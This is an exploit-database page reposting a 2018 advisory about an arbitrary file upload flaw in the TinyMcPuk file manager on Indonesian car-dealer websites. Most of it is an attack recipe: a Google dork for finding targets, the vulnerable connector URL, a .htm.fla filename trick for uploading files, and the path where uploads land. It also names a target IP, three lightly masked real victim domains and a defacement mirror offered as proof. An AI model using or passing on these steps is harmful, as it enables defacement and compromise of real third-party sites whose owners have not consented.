Advertisement






Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload

CVE Category Price Severity
CWE-3 Not specified Not specified
Author Risk Exploitation Type Date
Not specified Not specified Remote 2018-05-22
CPE
cpe:cpe:/a:mediatech:tinymcpuk
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050180

Below is a copy:

Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload
#################################################################################
# Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability
# Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage => mediatechindonesia.com
# Date: 22/05/2018

#################################################################################

Google Dork => All rights reserved.  2015 Media Tech Indonesia

Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm

Please upload your file as =>  /yourfilename.htm.fla

Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla

#################################################################################

Example Sites and Target IP => 103.27.206.203

dXaihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
sXuzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
tXoyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

Example Mirror [ Proof ] => zone-h.org/mirror/id/31184406

#################################################################################

Discovered By : KingSkrupellos from Cyberizm.Org

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum